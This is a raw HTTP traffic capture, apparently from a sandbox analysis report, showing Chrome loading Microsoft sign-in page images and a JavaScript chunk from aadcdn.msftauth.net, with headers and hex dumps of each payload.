                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20649995
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:52 GMT
                                                                                                                                          Etag: 0x8DB5C3F495F4B8C
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                          Server: ECAcc (lhc/7892)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 002cd9d5-201e-00e1-69ad-7d6453000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 3651
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:52 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          53192.168.2.1655180152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:53 UTC419OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:53 UTC738INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20649956
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:53 GMT
                                                                                                                                          Etag: 0x8DB5C3F466DE917
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:43 GMT
                                                                                                                                          Server: ECAcc (lhc/792B)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 60ece416-101e-0092-59ad-7deb55000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 1864
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:53 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          54192.168.2.1655181152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:53 UTC420OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:53 UTC738INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20649996
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:53 GMT
                                                                                                                                          Etag: 0x8DB5C3F495F4B8C
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                          Server: ECAcc (lhc/7892)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 002cd9d5-201e-00e1-69ad-7d6453000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 3651
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:53 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          55192.168.2.1655182152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:53 UTC665OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:54 UTC738INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20563979
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: R2FAVxfpONfnQAuxVxXbHg==
                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:54 GMT
                                                                                                                                          Etag: 0x8DB5C3F4BB4F03C
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:52 GMT
                                                                                                                                          Server: ECAcc (lhc/7928)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 21996301-501e-00c2-0976-7e8866000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 1592
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:54 UTC1592INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c
                                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          56192.168.2.1655183152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:53 UTC626OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:54 UTC750INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 8100972
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: 07aumYbfJEqwNBLMcAM10A==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:54 GMT
                                                                                                                                          Etag: 0x8DCBD52F42903D2
                                                                                                                                          Last-Modified: Thu, 15 Aug 2024 17:51:56 GMT
                                                                                                                                          Server: ECAcc (lhc/78A7)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 22797220-301e-0043-49cf-ef2c70000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 113769
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:54 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                                          2024-11-18 05:47:54 UTC1INData Raw: 75
                                                                                                                                          Data Ascii: u
                                                                                                                                          2024-11-18 05:47:54 UTC16383INData Raw: 32 30 30 61 22 2c 22 68 61 6c 66 22 3a 22 5c 78 62 64 22 2c 22 68 61 6d 69 6c 74 22 3a 22 5c 75 32 31 30 62 22 2c 22 48 41 52 44 63 79 22 3a 22 5c 75 30 34 32 61 22 2c 22 68 61 72 64 63 79 22 3a 22 5c 75 30 34 34 61 22 2c 22 68 61 72 72 63 69 72 22 3a 22 5c 75 32 39 34 38 22 2c 22 68 61 72 72 22 3a 22 5c 75 32 31 39 34 22 2c 22 68 41 72 72 22 3a 22 5c 75 32 31 64 34 22 2c 22 68 61 72 72 77 22 3a 22 5c 75 32 31 61 64 22 2c 22 48 61 74 22 3a 22 5e 22 2c 22 68 62 61 72 22 3a 22 5c 75 32 31 30 66 22 2c 22 48 63 69 72 63 22 3a 22 5c 75 30 31 32 34 22 2c 22 68 63 69 72 63 22 3a 22 5c 75 30 31 32 35 22 2c 22 68 65 61 72 74 73 22 3a 22 5c 75 32 36 36 35 22 2c 22 68 65 61 72 74 73 75 69 74 22 3a 22 5c 75 32 36 36 35 22 2c 22 68 65 6c 6c 69 70 22 3a 22 5c 75 32 30
                                                                                                                                          Data Ascii: 200a","half":"\xbd","hamilt":"\u210b","HARDcy":"\u042a","hardcy":"\u044a","harrcir":"\u2948","harr":"\u2194","hArr":"\u21d4","harrw":"\u21ad","Hat":"^","hbar":"\u210f","Hcirc":"\u0124","hcirc":"\u0125","hearts":"\u2665","heartsuit":"\u2665","hellip":"\u20
                                                                                                                                          2024-11-18 05:47:54 UTC16383INData Raw: 39 30 66 22 2c 22 52 42 61 72 72 22 3a 22 5c 75 32 39 31 30 22 2c 22 72 62 62 72 6b 22 3a 22 5c 75 32 37 37 33 22 2c 22 72 62 72 61 63 65 22 3a 22 7d 22 2c 22 72 62 72 61 63 6b 22 3a 22 5d 22 2c 22 72 62 72 6b 65 22 3a 22 5c 75 32 39 38 63 22 2c 22 72 62 72 6b 73 6c 64 22 3a 22 5c 75 32 39 38 65 22 2c 22 72 62 72 6b 73 6c 75 22 3a 22 5c 75 32 39 39 30 22 2c 22 52 63 61 72 6f 6e 22 3a 22 5c 75 30 31 35 38 22 2c 22 72 63 61 72 6f 6e 22 3a 22 5c 75 30 31 35 39 22 2c 22 52 63 65 64 69 6c 22 3a 22 5c 75 30 31 35 36 22 2c 22 72 63 65 64 69 6c 22 3a 22 5c 75 30 31 35 37 22 2c 22 72 63 65 69 6c 22 3a 22 5c 75 32 33 30 39 22 2c 22 72 63 75 62 22 3a 22 7d 22 2c 22 52 63 79 22 3a 22 5c 75 30 34 32 30 22 2c 22 72 63 79 22 3a 22 5c 75 30 34 34 30 22 2c 22 72 64 63 61
                                                                                                                                          Data Ascii: 90f","RBarr":"\u2910","rbbrk":"\u2773","rbrace":"}","rbrack":"]","rbrke":"\u298c","rbrksld":"\u298e","rbrkslu":"\u2990","Rcaron":"\u0158","rcaron":"\u0159","Rcedil":"\u0156","rcedil":"\u0157","rceil":"\u2309","rcub":"}","Rcy":"\u0420","rcy":"\u0440","rdca
                                                                                                                                          2024-11-18 05:47:54 UTC16383INData Raw: 74 72 69 63 74 22 3b 74 2e 41 6e 79 3d 72 28 38 38 34 29 2c 74 2e 43 63 3d 72 28 38 38 35 29 2c 74 2e 43 66 3d 72 28 31 33 38 31 29 2c 74 2e 50 3d 72 28 37 38 34 29 2c 74 2e 5a 3d 72 28 38 38 36 29 7d 2c 31 33 38 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 65 78 70 6f 72 74 73 3d 2f 5b 5c 78 41 44 5c 75 30 36 30 30 2d 5c 75 30 36 30 35 5c 75 30 36 31 43 5c 75 30 36 44 44 5c 75 30 37 30 46 5c 75 30 38 45 32 5c 75 31 38 30 45 5c 75 32 30 30 42 2d 5c 75 32 30 30 46 5c 75 32 30 32 41 2d 5c 75 32 30 32 45 5c 75 32 30 36 30 2d 5c 75 32 30 36 34 5c 75 32 30 36 36 2d 5c 75 32 30 36 46 5c 75 46 45 46 46 5c 75 46 46 46 39 2d 5c 75 46 46 46 42 5d 7c 5c 75 44 38 30 34 5b 5c 75 44 43 42 44 5c 75 44 43 43 44 5d 7c 5c 75 44 38 32 46 5b 5c 75 44 43 41 30 2d 5c
                                                                                                                                          Data Ascii: trict";t.Any=r(884),t.Cc=r(885),t.Cf=r(1381),t.P=r(784),t.Z=r(886)},1381:function(e,t){e.exports=/[\xAD\u0600-\u0605\u061C\u06DD\u070F\u08E2\u180E\u200B-\u200F\u202A-\u202E\u2060-\u2064\u2066-\u206F\uFEFF\uFFF9-\uFFFB]|\uD804[\uDCBD\uDCCD]|\uD82F[\uDCA0-\
                                                                                                                                          2024-11-18 05:47:54 UTC16383INData Raw: 4d 61 72 6b 73 5b 74 5d 3b 69 66 28 65 2e 73 43 6f 75 6e 74 5b 74 5d 2d 65 2e 62 6c 6b 49 6e 64 65 6e 74 3e 3d 34 29 72 65 74 75 72 6e 21 31 3b 69 66 28 34 32 21 3d 3d 28 6f 3d 65 2e 73 72 63 2e 63 68 61 72 43 6f 64 65 41 74 28 75 2b 2b 29 29 26 26 34 35 21 3d 3d 6f 26 26 39 35 21 3d 3d 6f 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 69 3d 31 3b 75 3c 6c 3b 29 7b 69 66 28 28 61 3d 65 2e 73 72 63 2e 63 68 61 72 43 6f 64 65 41 74 28 75 2b 2b 29 29 21 3d 3d 6f 26 26 21 6e 28 61 29 29 72 65 74 75 72 6e 21 31 3b 61 3d 3d 3d 6f 26 26 69 2b 2b 7d 72 65 74 75 72 6e 21 28 69 3c 33 29 26 26 28 73 7c 7c 28 65 2e 6c 69 6e 65 3d 74 2b 31 2c 28 63 3d 65 2e 70 75 73 68 28 22 68 72 22 2c 22 68 72 22 2c 30 29 29 2e 6d 61 70 3d 5b 74 2c 65 2e 6c 69 6e 65 5d 2c 63 2e 6d 61 72
                                                                                                                                          Data Ascii: Marks[t];if(e.sCount[t]-e.blkIndent>=4)return!1;if(42!==(o=e.src.charCodeAt(u++))&&45!==o&&95!==o)return!1;for(i=1;u<l;){if((a=e.src.charCodeAt(u++))!==o&&!n(a))return!1;a===o&&i++}return!(i<3)&&(s||(e.line=t+1,(c=e.push("hr","hr",0)).map=[t,e.line],c.mar
                                                                                                                                          2024-11-18 05:47:54 UTC16383INData Raw: 75 72 6e 20 72 3d 65 2e 73 72 63 2e 73 6c 69 63 65 28 63 2b 31 2c 6c 29 2c 73 2e 74 65 73 74 28 72 29 3f 28 6f 3d 65 2e 6d 64 2e 6e 6f 72 6d 61 6c 69 7a 65 4c 69 6e 6b 28 72 29 2c 21 21 65 2e 6d 64 2e 76 61 6c 69 64 61 74 65 4c 69 6e 6b 28 6f 29 26 26 28 74 7c 7c 28 28 69 3d 65 2e 70 75 73 68 28 22 6c 69 6e 6b 5f 6f 70 65 6e 22 2c 22 61 22 2c 31 29 29 2e 61 74 74 72 73 3d 5b 5b 22 68 72 65 66 22 2c 6f 5d 5d 2c 69 2e 6d 61 72 6b 75 70 3d 22 61 75 74 6f 6c 69 6e 6b 22 2c 69 2e 69 6e 66 6f 3d 22 61 75 74 6f 22 2c 28 69 3d 65 2e 70 75 73 68 28 22 74 65 78 74 22 2c 22 22 2c 30 29 29 2e 63 6f 6e 74 65 6e 74 3d 65 2e 6d 64 2e 6e 6f 72 6d 61 6c 69 7a 65 4c 69 6e 6b 54 65 78 74 28 72 29 2c 28 69 3d 65 2e 70 75 73 68 28 22 6c 69 6e 6b 5f 63 6c 6f 73 65 22 2c 22 61
                                                                                                                                          Data Ascii: urn r=e.src.slice(c+1,l),s.test(r)?(o=e.md.normalizeLink(r),!!e.md.validateLink(o)&&(t||((i=e.push("link_open","a",1)).attrs=[["href",o]],i.markup="autolink",i.info="auto",(i=e.push("text","",0)).content=e.md.normalizeLinkText(r),(i=e.push("link_close","a
                                                                                                                                          2024-11-18 05:47:54 UTC5INData Raw: 22 62 61 6c 61
                                                                                                                                          Data Ascii: "bala
                                                                                                                                          2024-11-18 05:47:54 UTC15465INData Raw: 6e 63 65 5f 70 61 69 72 73 22 2c 22 65 6d 70 68 61 73 69 73 22 2c 22 74 65 78 74 5f 63 6f 6c 6c 61 70 73 65 22 5d 7d 7d 7d 7d 2c 31 34 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 73 2c 6f 2c 69 2c 61 3d 5b 5d 2c 63 3d 74 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 72 3d 30 3b 72 3c 63 3b 72 2b 2b 29 34 33 3d 3d 3d 28 73 3d 74 5b 72 5d 29 2e 6d 61 72 6b 65 72 26 26 2d 31 21 3d 3d 73 2e 65 6e 64 26 26 28 6f 3d 74 5b 73 2e 65 6e 64 5d 2c 28 69 3d 65 2e 74 6f 6b 65 6e 73 5b 73 2e 74 6f 6b 65 6e 5d 29 2e 74 79 70 65 3d 22 69 6e 73 5f 6f 70 65 6e 22 2c 69 2e 74 61 67 3d 22 69 6e 73
                                                                                                                                          Data Ascii: nce_pairs","emphasis","text_collapse"]}}}},1428:function(e,t,r){"use strict";e.exports=function(e){function t(e,t){var r,n,s,o,i,a=[],c=t.length;for(r=0;r<c;r++)43===(s=t[r]).marker&&-1!==s.end&&(o=t[s.end],(i=e.tokens[s.token]).type="ins_open",i.tag="ins


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          57192.168.2.1655185152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:55 UTC420OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:55 UTC738INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20563980
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: R2FAVxfpONfnQAuxVxXbHg==
                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:55 GMT
                                                                                                                                          Etag: 0x8DB5C3F4BB4F03C
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:52 GMT
                                                                                                                                          Server: ECAcc (lhc/7928)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
